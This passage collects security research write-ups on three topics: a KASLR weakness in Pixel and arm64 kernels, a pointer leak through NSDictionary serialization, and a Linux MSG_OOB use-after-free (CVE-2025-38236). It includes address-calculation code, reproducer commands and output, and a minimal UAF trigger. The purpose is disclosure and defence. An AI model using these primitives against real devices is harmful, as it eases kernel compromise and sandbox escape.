      80010000-81baffff : Kernel code

      81fc0000-8225ffff : Kernel data


    Theoretically, the bootloader can place the kernel at a random physical address every boot, and many (but not all) other phones, such as the Samsung S25, do this. Unfortunately, Pixel phones are an example of a device that simply decompresses the kernel at a static physical address.

    Calculating static kernel virtual addresses

    This means that we can statically calculate a kernel virtual address for any kernel .data entry. Here’s an example of me computing that linear map address for the modprobe_path string in kernel .data on a Pixel 9:


    tokay:/ # grep modprobe_path /proc/kallsyms                                    

    ffffffee6ddf2398 D modprobe_path

    tokay:/ # grep stext /proc/kallsyms                                            

    ffffffee6be10000 T _stext

    //Offset from kernel base will be 0xffffffee6ddf2398 - 0xffffffee6be10000 = 0x1fe2398

    //Physical address will be 0x80010000 + 0x1fe2398 = 0x81ff2398

    //phys_to_virt(0x81ff2398) = 0xffffff8001ff2398

    tokay:/ # /data/local/tmp/bpf_arb_read ffffff8001ff2398 64                     

    ffffff8001ff2398  00 73 79 73 74 65 6d 2f 62 69 6e 2f 6d 6f 64 70  |.system/bin/modp|

    ffffff8001ff23a8  72 6f 62 65 00 00 00 00 00 00 00 00 00 00 00 00  |robe............|

    [ zeroes ]

    tokay:/ # reboot

    sethjenkins@sethjenkins91:~$ adb shell

    tokay:/ $ su

    tokay:/ # /data/local/tmp/bpf_arb_read ffffff8001ff2398 64

    ffffff8001ff2398  00 73 79 73 74 65 6d 2f 62 69 6e 2f 6d 6f 64 70  |.system/bin/modp|

    ffffff8001ff23a8  72 6f 62 65 00 00 00 00 00 00 00 00 00 00 00 00  |robe............|

    [ zeroes ]

    tokay:/ #


    So modprobe_path will always be accessible at the kernel virtual address 0xffffff8001ff2398, in addition to its normal mapping, even with KASLR enabled. In practice, on Pixel devices you can derive a valid virtual address for a kernel symbol by calculating its offset from _stext and simply adding a hardcoded static kernel base address of 0xffffff8000010000. In short, instead of leaking the KASLR slide, it is possible to simply use 0xffffff8000010000 as the kernel base.
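    The arithmetic above can be collected into a small helper. This is a sketch, not exploit code, using the static Pixel constants observed above (physical load address 0x80010000 and PHYS_OFFSET 0x80000000) and the modprobe_path offset computed from this boot's kallsyms output:

    ```c
    #include <inttypes.h>
    #include <stdio.h>

    /* Static Pixel constants observed above; in practice neither is randomized. */
    #define KERNEL_PHYS_BASE 0x80010000ULL       /* bootloader's kernel load address */
    #define PHYS_OFFSET      0x80000000ULL       /* memstart_addr */
    #define PAGE_OFFSET      0xffffff8000000000ULL

    static uint64_t phys_to_virt(uint64_t phys) {
        return (phys - PHYS_OFFSET) | PAGE_OFFSET;
    }

    /* Linear-map alias for a kernel symbol, given its offset from _stext.
     * Valid regardless of the KASLR slide. */
    static uint64_t static_kva(uint64_t offset_from_stext) {
        return phys_to_virt(KERNEL_PHYS_BASE + offset_from_stext);
    }

    int main(void) {
        /* modprobe_path offset from _stext, computed from kallsyms above */
        printf("modprobe_path alias: 0x%" PRIx64 "\n", static_kva(0x1fe2398));
        return 0;
    }
    ```

    Running this prints the same 0xffffff8001ff2398 address that bpf_arb_read dumped above.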


    The linear mapping memory is even mapped rw for any kernel .data regions. The only consolation that makes using this address slightly less effective than the traditional method of leaking the KASLR slide is that .text regions are not mapped executable - so an attacker cannot use this base for e.g. ROP gadgets or more generally PC control. But oftentimes, a Linux kernel attacker’s goal isn’t arbitrary code execution in kernel context anyway - arbitrary read-write is the more frequently desired primitive.

    Impact on devices with kernel physical address randomization


    Even on devices where the kernel location is randomized in the physical address space, linear mapping non-randomization still softens the kernel considerably to attempts at exploitation. This is particularly because techniques that involve spraying memory (either kernel structures or even userland mmaps!) can land at predictable physical addresses - and those physical addresses are easily referenceable in kernel virtual address space through the linear map. That potentially gives an attacker a methodology for placing kernel data structures or even simply attacker-controlled userland memory at a known kernel virtual address.

    I created a simple program that allocated (via mmap and page fault) a substantial quantity (~5 GB) of physical memory on a Samsung S23, then used /proc/pagemap to create a list of which physical page frame numbers (pfns) were allocated. I ran this program 100 times (rebooting in between each time), then counted how often each pfn appeared across the 100 execution cycles. The set of pfns and their counts for how often they appeared were then converted into an image where each pfn is represented by a single pixel. The brighter the green of a pixel, the more often that page was attacker controlled, with a white pixel representing a pfn that was allocated every time. A black pixel represents a pfn that was never allocated - often because those pfn numbers are not mapped to physical memory or because they are used every time in a deterministic way. A big thank you to Jann Horn for developing the tool to create this image from the data that I collected.
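    A heavily scaled-down sketch of that survey program might look like the following (16 pages instead of ~5 GB; note that reading real pfn values from /proc/self/pagemap requires CAP_SYS_ADMIN, and unprivileged readers see pfn 0 on modern kernels):

    ```c
    #include <fcntl.h>
    #include <inttypes.h>
    #include <stdio.h>
    #include <string.h>
    #include <sys/mman.h>
    #include <unistd.h>

    int main(void) {
        size_t pagesize = (size_t)sysconf(_SC_PAGESIZE);
        size_t npages = 16;  /* illustrative; the real survey touched ~5 GB */
        unsigned char *buf = mmap(NULL, npages * pagesize, PROT_READ | PROT_WRITE,
                                  MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
        if (buf == MAP_FAILED) return 1;
        memset(buf, 0x41, npages * pagesize);  /* page-fault every page in */

        int fd = open("/proc/self/pagemap", O_RDONLY);
        if (fd < 0) return 1;
        for (size_t i = 0; i < npages; i++) {
            uint64_t entry = 0;
            /* one 64-bit pagemap entry per virtual page number */
            off_t off = (off_t)(((uintptr_t)buf / pagesize + i) * sizeof(entry));
            if (pread(fd, &entry, sizeof(entry), off) != (ssize_t)sizeof(entry))
                break;
            uint64_t pfn = entry & ((1ULL << 55) - 1);  /* bits 0-54: pfn */
            printf("page %zu -> pfn 0x%" PRIx64 "\n", i, pfn);
        }
        close(fd);
        return 0;
    }
    ```

    Collecting these pfn lists across many reboots is what produces the allocation-frequency image described above.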




    This data exemplifies the non-homogeneous reliability of pfn allocation to userland mappings, albeit on a device that was only just rebooted. There are ranges of pfns that are allocated quite reliably, and other ranges that are quite unreliable (but still occasionally used). For example, here’s a range of pfns surrounding one of the pages that was allocated 100 times in a row. I suspect this sample is representative of the practical reliability of this technique for placing desired data at a known kernel address for at least a newly rebooted device.



    While reliability may suffer on a device that hasn’t rebooted in some time, it remains high enough to be inviting to real-world attackers. Being able to place arbitrarily readable and writable data at a known kernel virtual address is a powerful exploitation primitive as an attacker can much more easily forge kernel data structures or objects and, for example, emplace pointers to those objects in heap sprays attacking UAF issues.

    The Prognosis

    I reported these two separate issues, lack of linear map randomization, and kernel lands at static physical address in Pixel, to the Linux kernel team and Google Pixel respectively. However both of these issues are considered intended behavior. While Pixel may introduce randomized physical kernel load addresses at some later point as a feature, there are no immediate plans to resolve the lack of randomization of the Linux kernel’s linear map on arm64.

    Conclusion

    Three years ago, I wrote on the state of x86 KASLR and noted how “it is probably time to accept that KASLR is no longer an effective mitigation against local attackers and to develop defensive code and mitigations that accept its limitations.” While it remains true that KASLR should not be trusted to prevent exploitation, particularly in local contexts, it is regrettable that the attitude around Linux KASLR is so fatalistic that putting in the engineering effort to preserve its remaining integrity is not considered to be worthwhile. The joint effect of these two issues dramatically simplified what might otherwise have been a more complicated and likely less reliable exploit.

    While side-channel attacks do impact the long-term viability of KASLR on all architectures, it is notable that Project Zero and the Google Threat Intelligence Group have yet to see a hardware side-channel attack for bypassing KASLR on Android in the wild. Additionally, KASLR still plays an important role in mitigating any remote kernel exploitation attempts. It is valuable from a defense-in-depth perspective to recognize the impact KASLR has on exploit complexity and reliability in real-world scenarios. In the future, we hope to see changes to the Linux kernel linear mapping and memory hot-plugging implementation to make this a less inviting target for attackers. Randomizing the location of the linear map in the virtual address space, increasing the entropy in physical page allocation, and randomizing the location of the kernel in the physical address space are all concrete steps that can be taken that would improve the overall security posture of Android, the Linux kernel, and Pixel.



    Pointer leaks through pointer-keyed data structures

    26 September 2025, 14:00

    Posted by Jann Horn, Google Project Zero

    Introduction

    Some time in 2024, during a Project Zero team discussion, we were talking about how remote ASLR leaks would be helpful or necessary for exploiting some types of memory corruption bugs, specifically in the context of Apple devices. Coming from the angle of "where would be a good first place to look for a remote ASLR leak", this led to the discovery of a trick that could potentially be used to leak a pointer remotely, without any memory safety violations or timing attacks, in scenarios where an attack surface can be reached that deserializes attacker-provided data, re-serializes the resulting objects, and sends the re-serialized data back to the attacker.

    The team brainstormed, and we couldn't immediately come up with any specific attack surface on macOS/iOS that would behave this way, though we did not perform extensive analysis to test whether such attack surface exists. Instead of targeting a real attack surface, I tested the technique described here on macOS with an artificial test case that uses NSKeyedArchiver serialization as the target. Because of the lack of demonstrated real-world impact, I reported the issue to Apple without filing it in our bugtracker. It was fixed in the 31 Mar 2025 security releases. Links to Apple code in this post go to an outdated version of the code that hasn't been updated in years, and descriptions of how the code works refer to the old unfixed version.

    I decided to write about the technique since it is kind of intriguing and novel, and some of the ideas in it might generalize to other contexts. It is closely related to a partial pointer leak and another pointer ordering leak that I discovered in the past, and shows how pointer-keyed data structures can be used to leak addresses under ideal circumstances.

    Background - the tech tree

    hashDoS

    To me, the story of this issue begins in 2011, when the hashDoS attack was presented at 28C3 (slides, recording). In essence, hashDoS is a denial-of-service attack on services (in particular web servers) that populate hash tables with lots of attacker-controlled keys (like POST parameters). It is based on the observation that many hash table implementations have O(1) complexity per insert/lookup operation in the average case, but O(n) complexity for the same operations in the worst case (where the hashes of all keys land in the same hash bucket, and the hash table essentially turns into something like a linked list or an unsorted array depending on how it is implemented). In particular if the hash function used for keys is known to the attacker, then by constructing a request full of parameters whose keys all map to the same hash bucket, an attacker can cause the server to spend O(n²) time processing such a request; this turned out to be enough to keep a web server's CPU saturated using ridiculously small amounts of network traffic.

    There is also much older prior work on the idea of deliberately creating hash table collisions to leak addresses, as pointed out in a 29C3 talk about the same topic. Solar Designer wrote in Phrack issue 53 back in 1998:

    ----[ Data Structures and Algorithm Choice

    When choosing a sorting or data lookup algorithm to be used for a normal application, people are usually optimizing the typical case. However, for IDS [intrusion detection systems] the worst case scenario should always be considered: an attacker can supply our IDS with whatever data she likes. If the IDS is fail-open, she would then be able to bypass it, and if it's fail-close, she could cause a DoS for the entire protected system.

    Let me illustrate this by an example. In scanlogd, I'm using a hash table to lookup source addresses. This works very well for the typical case as long as the hash table is large enough (since the number of addresses we keep is limited anyway). The average lookup time is better than that of a binary search. However, an attacker can choose her addresses (most likely spoofed) to cause hash collisions, effectively replacing the hash table lookup with a linear search. Depending on how many entries we keep, this might make scanlogd not be able to pick new packets up in time. This will also always take more CPU time from other processes in a host-based IDS like scanlogd.

    [...]

    It is probably worth mentioning that similar issues also apply to things like operating system kernels. For example, hash tables are widely used there for looking up active connections, listening ports, etc. There're usually other limits which make these not really dangerous though, but more research might be needed.

    hashDoS as a timing attack

    From a slightly different perspective, the central observation of hashDoS is: If an attacker can insert a large number of chosen keys into a hash table (or hash set) and knows which hash buckets these keys hash to, then the attacker can (depending on hash table implementation details) essentially slow down future accesses to a chosen hash bucket.

    This becomes interesting if the attacker can cause the insertion of other keys whose hashes are secret into the same hash table. In practice, this can for example happen with hash tables which support mixing multiple key types together, like JavaScript's Map. Back in 2016, in the Firefox implementation, int32 numbers were hashed with a fixed hash function ScrambleHashCode(number), while strings were atomized/interned and then hashed based on their virtual address. That made it possible to first fill an attacker-chosen hash table bucket with lots of elements, then insert a string, observe whether its insertion is fast or slow, and determine from that whether the string's hash matches the attacker-chosen hash bucket.

    With some tricks relying on a pattern in the addresses of interned single-character strings in Firefox, that made it possible to leak the lower 32 bits of a heap address through Map insertions and timing measurements. For more details, see the original writeup and bug report. Of course, nowadays that kind of timing-based in-process partial pointer leak from JavaScript would be considered less interesting, since it is generally assumed that JavaScript can read all memory in the same process anyway...

    A takeaway from this is: When pointers are used as the basis for object hash codes, this can leak pointers through side channels in keyed data structures.

    Linux: object ordering leak through in-order listing of a pointer-keyed tree

    As I noted in a blog post a few years ago, on Linux, it is possible for unprivileged userspace to discover in what order struct file instances are stored in kernel virtual memory by reading from /proc/self/fdinfo/<epoll fd> - this file lists all files that are watched by an epoll instance by iterating through a red-black tree that is (essentially) sorted by the virtual address of the referenced struct file, so the data given to userspace is sorted in the same way.

    (As I noted in that post, this could be particularly interesting for breaking probabilistic memory safety mitigations that rely on pointer tagging. If the highest bits of pointers are secret tag bits, and an attacker can determine the order of the addresses (including tag bits) of objects, the attacker can infer whether an object's tag changed after reallocation.)

    A takeaway from this is: Keyed data structures don't just leak information about object hash codes through timing; iterating over a keyed data structure can also generate data whose ordering reveals information about object hash codes.

    Serialization attacks

    There are various approaches to serializing an object graph. On one side of the spectrum is schema-based serialization, where ideally:

    • serializable types with their members are declared separately from other types

    • fields explicitly declare which other types they can point to (there are no generic pointers that can point to anything)

    • deserialization starts from a specific starting type

    On the other side of the serialization spectrum are things like classic Java serialization (without serialization filters), where essentially any class marked as Serializable can be deserialized, serialized fields can often flexibly point to lots of different types, and therefore serialized data can also have a lot of control over the shape of the resulting object graph. There is a lot of public research on the topic of "serialization gadget chains" in Java, where objects can be combined such that deserializing them results in things like remote code execution. This type of serialization is generally considered to be unsafe for use across security boundaries, though Android exposes it across local security boundaries.

    Somewhere in the middle of this spectrum is serialization that is fundamentally built like unsafe deserialization, but adds some coarse filters that only allow deserialized objects to have types from an allowlist to make it safe. In Java, that is called "serialization filtering". This is also approximately the behavior of Apple's NSKeyedUnarchiver.unarchivedObjectOfClasses, which this post focuses on.


    An artificial test case

    The goal of the technique described in this post is to leak a pointer to the "shared cache" (a large mapping which is at the same virtual address across all processes on the system, whose address only changes on reboot) through a single execution of the following test case, which uses NSKeyedUnarchiver.unarchivedObjectOfClasses to deserialize an attacker-supplied object graph consisting of the types NSDictionary, NSNumber, NSArray and NSNull, re-serializes the result, and writes back the resulting serialized data:

    @import Foundation;

    int main() {

      @autoreleasepool {

        NSArray *args = [[NSProcessInfo processInfo] arguments];

        if (args.count != 3) {

          NSLog(@"bad invocation");

          return 1;

        }

        NSString *in_path = args[1];

        NSString *out_path = args[2];


        NSError *error = NULL;


        NSData *input_binary = [NSData dataWithContentsOfFile:in_path];


        /* decode */

        NSArray<Class> *allowed_classes = @[ [NSDictionary class], [NSNumber class], [NSArray class], [NSString class], [NSNull class] ];

        NSObject *decoded_data = [NSKeyedUnarchiver unarchivedObjectOfClasses:[NSSet setWithArray:allowed_classes] fromData:input_binary error:&error];

        if (error) {

          NSLog(@"Error %@ decoding", error);

          return 1;

        }

        NSLog(@"decoded");


        NSData *encoded_binary = [NSKeyedArchiver archivedDataWithRootObject:decoded_data requiringSecureCoding:true error:&error];

        if (error) {

          NSLog(@"Error %@ encoding", error);

          return 1;

        }

        NSLog(@"reencoded");


        [encoded_binary writeToFile:out_path atomically:NO];

      }

      return 0;

    }


    (The test case also allows NSString, but I think that was irrelevant.)

    Building blocks

    The NSNull / CFNull singleton

    The CFNull type is special: There is only one singleton instance of it, kCFNull, implemented in CFBase.c, which is stored in the shared cache. When you deserialize an NSNull object, this doesn't actually create a new object - instead, the singleton is used.

    In the CFRuntimeClass for CFNull, __CFNullClass, no hash handler is provided. When CFHash is called on an object with a type like __CFNullClass that does not implement a ->hash handler, the address of the object is used as the hash code.

    Pointer-based hashing is not specific to NSNull; but there probably aren't many other types for which deserialization uses singletons in the shared cache. There are probably way more types for which instances' hashes are heap addresses.

    NSNumber

    The NSNumber type encapsulates a number and supports several types of numbers; its hash handler __CFNumberHash hashes 32-bit integers with _CFHashInt, which pretty much just performs a multiplication with some big prime number.
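    As a rough sketch of what that means for an attacker: since the hash is a fully deterministic multiplication, choosing NSNumber keys that land in a desired bucket reduces to solving hash(n) % num_buckets for the target index. The exact constant and sign handling below are assumptions modeled on CF's HASHFACTOR (Knuth's multiplicative hashing constant 2654435761), not a verified copy of _CFHashInt:

    ```c
    #include <stdint.h>
    #include <stdio.h>

    /* Sketch of multiplicative integer hashing in the style of _CFHashInt.
     * HASHFACTOR and the absolute-value handling are assumptions. */
    #define HASHFACTOR 2654435761ULL

    static uint64_t hash_int(int64_t i) {
        uint64_t mag = (i >= 0) ? (uint64_t)i : (uint64_t)(-i);
        return mag * HASHFACTOR;
    }

    int main(void) {
        /* An attacker picking NSNumber keys can search for values n whose
         * hash_int(n) % num_buckets equals a desired bucket index. */
        int num_buckets = 23;
        for (int64_t n = 0; n < 5; n++)
            printf("hash(%lld) %% %d = %llu\n", (long long)n, num_buckets,
                   (unsigned long long)(hash_int(n) % num_buckets));
        return 0;
    }
    ```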

    NSDictionary

    Instances of the NSDictionary type are immutable hash tables and can contain arbitrarily-typed keys. Key hashes are mapped to hash table buckets using a simple modulo operation: hash_code % num_buckets. The number of hash buckets in a NSDictionary is always a prime number (see __CFBasicHashTableSizes); hash table sizes are chosen based on __CFBasicHashTableCapacities such that hash tables are normally roughly half-full (around 38%-62%), though the sizing is a bit different for small sizes. These are probing-style hash tables; so rather than having a linked list off each hash bucket, collisions are handled by finding alternate buckets to store colliding elements in using the policy __kCFBasicHashLinearHashingValue / FIND_BUCKET_HASH_STYLE == 1, under which insertion scans forward through the hash table buckets.

    I haven't found source code for serialization of NSDictionary, but it appears to happen in the obvious way, by iterating through the hash buckets in order.

    The attack

    The basic idea: Infoleak through key ordering in serialized NSDictionary

    If a targeted process fills an NSDictionary with attacker-chosen NSNumber keys (through deserialization), the attacker can control which hash buckets will be used by using numbers for which the number's hash modulo the hash table size results in the desired bucket index. If the targeted process then inserts an NSNull key (still as part of the same deserialization), and then serializes the resulting NSDictionary, the location of the NSNull key in the dictionary's serialized keys will reveal information about the hash of NSNull.

    In particular, the attacker can create a pattern like this using NSNumber keys (where # is a bucket occupied by an NSNumber, and _ is a bucket left empty), where even-numbered buckets are occupied and odd-numbered buckets are empty, here with the example of a hash table of size 7:

    bucket index:    0123456

    bucket contents: #_#_#_#


    This leaves three spots where the NSNull could be inserted (marked with !):

    • At index 1 (#!#_#_#). This happens if hash_code % num_buckets is 6, 0, or 1. (For 6 and 0, insertion would scan linearly through the buckets until finding the free bucket at index 1.) This would result in NSNull being second in the serialized data.

    • At index 3 (#_#!#_#). This happens if hash_code % num_buckets is 2 or 3. This would result in NSNull being third in the serialized data.

    • At index 5 (#_#_#!#). This happens if hash_code % num_buckets is 4 or 5. This would result in NSNull being fourth in the serialized data.

    If the serialized data is then sent back to the attacker, the attacker can distinguish between these three states (based on the index of the NSNull key in the serialized data), and learn in which range hash_code % num_buckets is.
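    The bucket placement above can be checked with a tiny simulation of the scan-forward linear-probing insert against the #_#_#_# pattern (the 7-bucket table and the pre-filled even buckets mirror the example; the real tables are larger):

    ```c
    #include <stdio.h>

    #define NBUCKETS 7
    #define EMPTY   0
    #define NUMBER  1  /* bucket pre-filled with an NSNumber key */
    #define NULLOBJ 2  /* the inserted NSNull key */

    /* Linear-probing insert: scan forward from hash % NBUCKETS, wrapping
     * around, until a free bucket is found; return its index. */
    static int probe_insert(int *buckets, int hash) {
        for (int i = 0; i < NBUCKETS; i++) {
            int idx = (hash + i) % NBUCKETS;
            if (buckets[idx] == EMPTY) { buckets[idx] = NULLOBJ; return idx; }
        }
        return -1;
    }

    int main(void) {
        for (int h = 0; h < NBUCKETS; h++) {
            /* even-indexed buckets occupied by NSNumber keys: # _ # _ # _ # */
            int buckets[NBUCKETS] =
                {NUMBER, EMPTY, NUMBER, EMPTY, NUMBER, EMPTY, NUMBER};
            printf("hash %% 7 == %d -> NSNull lands in bucket %d\n",
                   h, probe_insert(buckets, h));
        }
        return 0;
    }
    ```

    The output reproduces the three groups described above: hashes 6, 0 and 1 end up in bucket 1; hashes 2 and 3 in bucket 3; hashes 4 and 5 in bucket 5.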

    Extending it: Leaking the entire bucket index

    If the attack from the last section is repeated with the following pattern (occupying odd-numbered buckets and leaving even-numbered ones empty), this yields more information about hash_code % num_buckets:

    0123456

    _#_#_#_


    (Caveat: Don't think too hard about how a hash table with 3 elements would use only 3 buckets and therefore wouldn't look like this. The actual reproducer uses hash tables with >=23 buckets.)

    Now we have four spots where the NSNull could be inserted:

    • At index 0, if hash_code % num_buckets is 0.

    • At index 2, if hash_code % num_buckets is 1 or 2.

    • At index 4, if hash_code % num_buckets is 3 or 4.

    • At index 6, if hash_code % num_buckets is 5 or 6.

    By combining the information from an NSDictionary that uses the even-buckets-occupied pattern and an NSDictionary that uses the odd-buckets-occupied pattern, the exact value of hash_code % num_buckets can be determined; for example, if the first pattern results in #_#!#_# and the second pattern results in _#!#_#_, then hash_code % num_buckets is 2.

    So by sending a serialized NSArray containing two NSDictionary instances with these patterns of NSNumber and NSNull keys to some targeted process, and then receiving a re-serialized copy from the victim, an attacker can determine hash_code % num_buckets for the NSNull singleton.

    Some math: Leaking the entire hash_code

    To leak even more information about the hash_code, this can be repeated with different hash table sizes. The attack from the last section leaks hash_code % num_buckets, where num_buckets is a prime number that the attacker can pick from the possible sizes __CFBasicHashTableSizes based on how many elements are in each NSDictionary.

    A useful math trick here is: Based on the values resulting from calculating hash_code modulo a bunch of different prime numbers, hash_code modulo the product of all those prime numbers can be calculated using the extended Euclidean algorithm. Therefore, based on knowing hash_code % num_buckets for the hash table sizes 23, 41, 71, 127, 191, 251, 383, 631 and 1087, it is possible to determine hash_code modulo 23*41*71*127*191*251*383*631*1087 = 0x5'ce23'017b'3bd5'1495. Because 0x5'ce23'017b'3bd5'1495 is bigger than the biggest value hash_code can have (since hash_code is 64-bit), that will be the actual value of hash_code - the address of the NSNull singleton.
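    The reconstruction can be sketched as an incremental Chinese remainder theorem computation. This is a standalone demonstration, not the reproducer's code: it takes a sample address (the NSNull singleton value from the reproducer run in this post), derives the residues modulo the nine hash table sizes, and recovers the full 64-bit value. The 128-bit arithmetic relies on the GCC/Clang __int128 extension.

    ```c
    #include <assert.h>
    #include <stdint.h>
    #include <stdio.h>

    typedef unsigned __int128 u128;

    /* Modular inverse of a mod m (m prime, gcd(a, m) == 1), extended Euclid. */
    static int64_t mod_inverse(int64_t a, int64_t m) {
        int64_t old_r = a, r = m, old_s = 1, s = 0;
        while (r != 0) {
            int64_t q = old_r / r, t;
            t = old_r - q * r; old_r = r; r = t;
            t = old_s - q * s; old_s = s; s = t;
        }
        return ((old_s % m) + m) % m;
    }

    int main(void) {
        const int64_t primes[] = {23, 41, 71, 127, 191, 251, 383, 631, 1087};
        const int n = sizeof(primes) / sizeof(primes[0]);

        /* The secret the attacker wants: in the real attack, only the
         * residues addr % primes[i] are observed (via bucket indices). */
        uint64_t addr = 0x1eb91ab60ULL;
        int64_t residues[9];
        for (int i = 0; i < n; i++)
            residues[i] = (int64_t)(addr % (uint64_t)primes[i]);

        /* Incremental CRT: maintain x = hash_code mod M, growing M one prime
         * at a time; once M > 2^64, x is hash_code itself. */
        u128 x = (u128)residues[0];
        u128 M = (u128)primes[0];
        for (int i = 1; i < n; i++) {
            int64_t p = primes[i];
            int64_t m_mod_p = (int64_t)(M % (u128)p);
            int64_t diff = ((residues[i] - (int64_t)(x % (u128)p)) % p + p) % p;
            int64_t t = (int64_t)(((u128)diff *
                                   (u128)mod_inverse(m_mod_p, p)) % (u128)p);
            x += M * (u128)t;
            M *= (u128)p;
        }
        printf("reconstructed = 0x%llx\n", (unsigned long long)x);
        assert((uint64_t)x == addr);
        return 0;
    }
    ```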

    Putting it together

    So to leak the address of the NSNull singleton in the shared cache, an attacker has to send serialized data consisting of one large container (such as an NSArray) that, for each prime number of interest, contains two NSDictionary instances with the even-indices and odd-indices patterns. (The NSNull keys should come last in the attacker-provided serialized NSDictionary instances, so my reproducer constructs the serialized data manually as an XML plist, and I then convert it to a binary plist with plutil.)

    This attacker-provided serialized data is about 50 KiB in size.

    The targeted process then has to deserialize this data, serialize it again, and send it back to the attacker.

    Afterwards, the attacker can determine in which buckets NSNull was stored in each NSDictionary, use the bucket indices from pairs of NSDictionary to determine hash_code % num_buckets for each hash table size, and then use the extended Euclidean algorithm to obtain hash_code, the address of the NSNull singleton.

    The reproducer

    I wrote a reproducer for this issue, consisting of my own victim program that runs on the target machine and attacker programs that provide serialized data to the target machine and receive re-serialized data from the target. (For easy reproduction, you can test this on a single machine, that's also what I did; though I rebooted between "attacker" and "target" to make sure the attacker isn't using the same shared cache address as the target.)

    First, on the attacker machine, generate serialized data:

    % clang -o attacker-input-generator attacker-input-generator.c

    % ./attacker-input-generator > attacker-input.plist

    % plutil -convert binary1 attacker-input.plist


    Then, on the target machine, deserialize and re-serialize this data:

    % clang round-trip-victim.m -fobjc-arc -fmodules -o round-trip-victim

    % ./round-trip-victim attacker-input.plist reencoded.plist

    2024-11-25 22:29:44.043 round-trip-victim[1257:11287] decoded

    2024-11-25 22:29:44.049 round-trip-victim[1257:11287] reencoded


    For validation, you can also use this helper on the target machine to see the real address of the CFNull singleton:

    % clang debug-nsnull-hash.m -fobjc-arc -fmodules -o debug-nsnull-hash

    % ./debug-nsnull-hash

    null singleton pointer = 0x1eb91ab60, null_hash = 0x00000001eb91ab60


    Then, on the attacker machine, process the re-serialized data:

    % plutil -convert xml1 reencoded.plist

    % clang -o extract-pointer extract-pointer.c

    % ./extract-pointer < reencoded.plist

    serialized data with 1111 objects

    NSNull class is 12, NSNull object is 11

    NSNull is elem 8 out of 13

    NSNull is elem 7 out of 12

    NSNull is elem 7 out of 22

    NSNull is elem 7 out of 21

    NSNull is elem 6 out of 37

    NSNull is elem 5 out of 36

    NSNull is elem 61 out of 65

    NSNull is elem 60 out of 64

    NSNull is elem 32 out of 97

    NSNull is elem 31 out of 96

    NSNull is elem 95 out of 127

    NSNull is elem 95 out of 126

    NSNull is elem 175 out of 193

    NSNull is elem 175 out of 192

    NSNull is elem 188 out of 317

    NSNull is elem 188 out of 316

    NSNull is elem 214 out of 545

    NSNull is elem 214 out of 544


    NSNull mod 23 = 14

    NSNull mod 41 = 13

    NSNull mod 71 = 10

    NSNull mod 127 = 120

    NSNull mod 191 = 62

    NSNull mod 251 = 189

    NSNull mod 383 = 349

    NSNull mod 631 = 375

    NSNull mod 1087 = 427


    NSNull mod 0x000000000000000000000000000003af =

    0x0000000000000000000000000000017e

    NSNull mod 0x00000000000000000000000000010589 =

    0x000000000000000000000000000059e6

    NSNull mod 0x0000000000000000000000000081bef7 =

    0xfffffffffffffffffffffffffff4177a

    NSNull mod 0x00000000000000000000000060cd7a49 =

    0x000000000000000000000000078e47f3

    NSNull mod 0x00000000000000000000005ee976e593 =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x000000000000000000008dff48e176ed =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x0000000000000000015e003ca3bc222b =

    0x000000000000000000000001eb91ab60

    NSNull mod 0x0000000000000005ce23017b3bd51495 =

    0x000000000000000000000001eb91ab60


    NSNull = 0x1eb91ab60


    Conclusion

    This is a fairly theoretical attack; but I think it demonstrates that using pointers as object hashes for keyed data structures can lead to pointer leaks if everything lines up right, even without using timing attacks.

    My example relies on the victim re-serializing the data; but a timing attack version of this might be possible too, with significantly more requests and sufficiently precise measurements.

    In my testcase, NSDictionary made it possible to essentially leak information about the ordering of pointers and hashes of numbers by mixing keys of different types; but it is probably possible to leak some amount of information even from data structures that only use pointer keys without mixing key types, especially when the attacker can guess how far apart heap objects are allocated or such and/or can reference the same objects repeatedly across multiple containers.

    The most robust mitigation against this is to avoid using object addresses as lookup keys, or alternatively hash them with a keyed hash function (which should reduce the potential address leak to a pointer equality oracle). However, that could come with negative performance effects - in particular, using an ID stored inside an object instead of the object's address could add a memory load to the critical path of lookups.



    From Chrome renderer code exec to kernel with MSG_OOB

    August 8, 2025, 07:43

    Posted by Jann Horn, Google Project Zero

    Introduction

    In early June, I was reviewing a new Linux kernel feature when I learned about the MSG_OOB feature supported by stream-oriented UNIX domain sockets. I reviewed the implementation of MSG_OOB, and discovered a security bug (CVE-2025-38236) affecting Linux >=6.9. I reported the bug to Linux, and it got fixed. Interestingly, while the MSG_OOB feature is not used by Chrome, it was exposed in the Chrome renderer sandbox. (Since then, sending MSG_OOB messages has been blocked in Chrome renderers in response to this issue.)

    The bug is pretty easy to trigger; the following sequence results in UAF:

    // Minimal trigger (needs Linux >= 6.9 with AF_UNIX OOB support):
    char dummy;
    int socks[2];
    socketpair(AF_UNIX, SOCK_STREAM, 0, socks);
    send(socks[1], "A", 1, MSG_OOB);     // leave behind a consumed OOB SKB...
    recv(socks[0], &dummy, 1, MSG_OOB);
    send(socks[1], "A", 1, MSG_OOB);     // ...twice
    recv(socks[0], &dummy, 1, MSG_OOB);
    send(socks[1], "A", 1, MSG_OOB);     // the SKB that will dangle
    recv(socks[0], &dummy, 1, 0);        // frees it, ->oob_skb still points to it
    recv(socks[0], &dummy, 1, MSG_OOB);  // use-after-free


    I was curious to explore how hard it is to actually exploit such a bug from inside the Chrome Linux Desktop renderer sandbox on an x86-64 Debian Trixie system, escalating privileges directly from native code execution in the renderer to the kernel. Even if the bug is reachable, how hard is it to find useful primitives for heap object reallocation, delay injection, and so on?

    The exploit code is posted on our bugtracker; you may want to reference it while following along with this post.

    Backstory: The feature

    Support for using MSG_OOB with AF_UNIX stream sockets was added in 2021 with commit 314001f0bf92 ("af_unix: Add OOB support", landed in Linux 5.15). With this feature, it is possible to send a single byte of "out-of-band" data that the recipient can read ahead of the rest of the data. The feature is very limited - out-of-band data is always a single byte, and there can only be a single pending byte of out-of-band data at a time. (Sending two out-of-band messages one after another causes the first one to be turned into a normal in-band message.) This feature is used almost nowhere except in Oracle products, as discussed on an email thread from 2024 where removal of the feature was proposed; yet it is enabled by default when AF_UNIX socket support is enabled in the kernel config, and it wasn't even possible to disable MSG_OOB support until commit 5155cbcdbf03 ("af_unix: Add a prompt to CONFIG_AF_UNIX_OOB") landed in December 2024.
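    These semantics can be observed directly from userspace. The following demo assumes a Linux >= 5.15 kernel with CONFIG_AF_UNIX_OOB enabled; sending a second OOB byte demotes the first to ordinary in-band data.

    ```c
    #include <assert.h>
    #include <stdio.h>
    #include <sys/socket.h>

    int main(void)
    {
        int socks[2];
        char c = 0;

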